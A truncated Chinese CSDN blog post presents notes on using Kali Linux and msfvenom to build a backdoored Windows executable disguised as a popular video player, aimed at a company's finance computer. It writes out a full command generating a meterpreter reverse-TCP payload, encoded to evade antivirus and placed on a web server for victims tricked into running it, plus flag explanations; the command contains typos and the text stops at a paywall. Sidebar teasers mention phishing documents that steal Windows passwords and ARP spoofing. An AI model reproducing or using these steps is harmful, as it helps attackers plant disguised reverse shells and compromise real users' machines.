kali制作windows客户端恶意软件进行渗透笔记

最新推荐文章于 2024-07-28 13:32:34 发布
最新推荐文章于 2024-07-28 13:32:34 发布
阅读量1.1k 收藏 7
点赞数 4
分类专栏: 网络安全 萌新 kali metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kingru/article/details/105731759
版权
本文介绍了如何利用Kali Linux制作Windows恶意软件,以渗透测试公司的财务电脑。通过msfvenom生成快播和西瓜影音的后门木马,并在目标IP上监听。在Windows 7环境中运行生成的软件,成功建立连接后,可以使用metasploit的evasion模块增强免杀能力。
摘要由CSDN通过智能技术生成

1.客户端渗透原理

无法突破对方网络边界的时候,向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。
我们要利用免杀来躲避安全软件的查杀。
制作windows恶意软件获取shell
Msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在主机上执行,在本地监听上线。

2.实战-制作windows恶意软件获取公司财务电脑使用msfvenom生成快播和西瓜影音看片神器后门木马
Kali运行handler,payload 在目标IP xxx端口监听后门请求

生成西瓜影音.exe windows 下的恶意软件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LOHSTS=192.168.xxx.xxx LPROT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音1.exe 

-a 指定构架如x86 x64。 x86代表32位, x64代表64位。 32位软件可以在64 位系统上运行。所以我们生成32位的后门。这样在32位和64位系统中都可以使用。
--platform 指定平台,这里选择windows 通过 --l platform可以查看所有支持平台。
-p 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷
-e 指定编码器,也就是所谓的免杀, x64/shikata_ga_nai是msf自带的编码器 -l encode 查看有多少编码器
-i 制作的软件字节ÿ
最低0.47元/天 解锁文章
LOVEYY0055
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali中使用msf制作Windows恶意软件获取shell
weixin_43894771的博客
03-09 1174
1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 1.1.1生成西瓜影音.exe后门程序 1.1.2在MSF上启动handler开始监听后门程序 1.1.3在Kali上...
使用恶意捆绑URL工具入侵Windows(恶意文档利用)
我不是猫叔
09-08 607
恶意盗取Windows 登录密码的Word 文档 通过使用phishery工具将恶意url注入到word文档,这将导致MicrosoftWord向URL发出请求,从而向最终用户显示身份验证对话框。可以使用phishery的URL注入任何.docx文件。 第一步:根据需要修改提供的setings.json文件,默认情况下它应该如下所示 { “ip”: “0.0.0.0”, “port”: “443...
如何利用Kali Linux进行网站渗透测试:最常用工具详解
最新发布
dzqxwzoe的博客
07-28 368
使用方法只能当做参考,建议您在搜索引擎上输入相关关键词,例如: “Kali Linux 工具名中文教程”,这样可以找到一些比较新的教程,同时您也可以参考官方文档或官方社区里跟相应工具相关的讨论。
快看这些wireshark 命令,必须得会!
mengmeng_921的博客
04-12 2297
5.2、搜索按条件过滤tcp的数据段payload(数字20是表示tcp头部有20个字节,数据部分从第21个字节开始tcp[20:])5.1、搜索按条件过滤udp的数据段payload(数字8是表示udp头部有8个字节,数据部分从第9个字节开始udp[8:])检测SMB头的smb标记,tcp的数据包含十六进制ff:53:4d:42,从tcp头部开始搜索此数据。Protocol :ether、ip、tcp、udp、http、ftp 指出协议。Direction:src、dst 指出传输方向 (源 、目的)
kali linux 渗透测试之内网渗透
05-02
理论加实战结合,学习后具备自动化批量控制内网主机的能力,具备安全工程师岗位的基本能力。专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。
Kali渗透攻击
m0_64091527的博客
05-31 1979
kali渗透攻击
Kali linux无线网络渗透详解笔记
chenweida1的博客
04-30 1万+
Kali linux无线网络渗透详解笔记第一章:搭建渗透环境测试环境第二章:WiFi网络的构成第三章:监听WiFi网络第四章:捕获数据包第五章 分析数据包新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX...
kaliWEB渗透笔记
fhl5203的博客
11-01 5177
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
【Linux_Kali网络渗透测试学习笔记总结(六)】漏洞利用
数据库爆破专家的博客
04-30 4045
网络渗透测试(六):漏洞利用 编写漏洞利用程序(exploit) 的程序代码都不仅费时费力,而且代码的质量直接关系找整个工作环节的成败。因此,渗透人员需要根据目标环境的实际情况对通过公开渠道获取的exploit程序进行相应调整。这种调整工作的技术含量很高,而且这类工作通常都是触类旁通的。掌握相应技能的人员可以举一反三地对很多程序进行调整。强烈建议读者在编写自己的漏洞利用程序之前,先通过公开渠道获取...
网络渗透笔记
weixin_67832238的博客
04-07 1017
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项 选项1是安装Apach
kali内网渗透小技巧
m0_55017965的博客
03-29 3117
基础知识点: 重点:让kali和其他电脑连接在同一个内网上 arpspoof:arp断网攻击 1.ifconfig输入,观察自己Kali的内网IP 2.查询与自己kali处于一个内网的IP:fping -asg +ip地址 3.攻击任何一台属于内网的主机 4.arpspoof -i eth0 -t ip地址 目标网关(可以自己计算) 另外,还可以进行目标监听,知道对方在访问什么图片,网址,一切归功于arp协议的漏洞。 ...
kali渗透内网和外网
xnxqwzy的博客
02-23 2042
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
Kali对内网主机进行渗透并执行关机
weixin_43894771的博客
03-08 7078
1.1发起攻击的准备阶段 1.1.1启动msf模块 使用msfconsole 1.1.2查找已知漏洞 利用search加已知漏洞进行查找 1.1.3扫一下局域网存活的主机,选择攻击目标 1.1.4设置攻击目标ip Set rhosts 目标ip 1.1.5搜索攻击载荷 Search type:payload windows/shell 1.1.6设置监听地址 Set lhosts 监听i...
学习Kali渗透测试笔记
m0_51418771的博客
09-13 1969
学习笔记
Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kali中MSF基础命令
天下著书立传者,皆为我师
04-18 563
Metasploitable2-linux:攻击机 192.168.234.8。kali-debian:攻击机 192.168.234.141。修改网卡后,需要重启网卡:service networking restart。win7 虚拟机:靶机 192.168.234.158。注:win7靶机需要关闭防火墙,kali才能ping通。同时还需要配置虚拟机网络。
Kali Linux渗透测试进阶提升及其实战教程
11-07
一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要      本课程主要分享Kali Linux渗透测试进阶实战技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
msfvenom的使用
公众号shadow sock7
04-26 6625
参考: http://www.zerokeeper.com/tools/use-of-msfvenom.htmlMsfvenom 是净荷生成和编码的组合。 它将取代 msfpayload 和 msfencode 于 2015 年 6 月 8 日。产生一个payload要用msfvenom产生一个payload必须要指定-p, --payload和-f --format两个参数。 查找有哪些有些p
metasploit framework详解
热门推荐
成长
01-23 2万+
metasploit详细介绍,主要介绍了msfconsole和msfvenom工具的使用,同时进行了payload实验,拿取对方shell。
实战指南:利用Kali Linux进行渗透测试
《利用Kali进行黑客攻击:实战渗透测试技术》是一本由James Broad和Andrew Bindner合著的专业书籍,它全面指导读者通过当前最先进的Live CD/USB系统Kali Linux进行渗透测试。本书旨在提供一个实用且深入的指南,帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值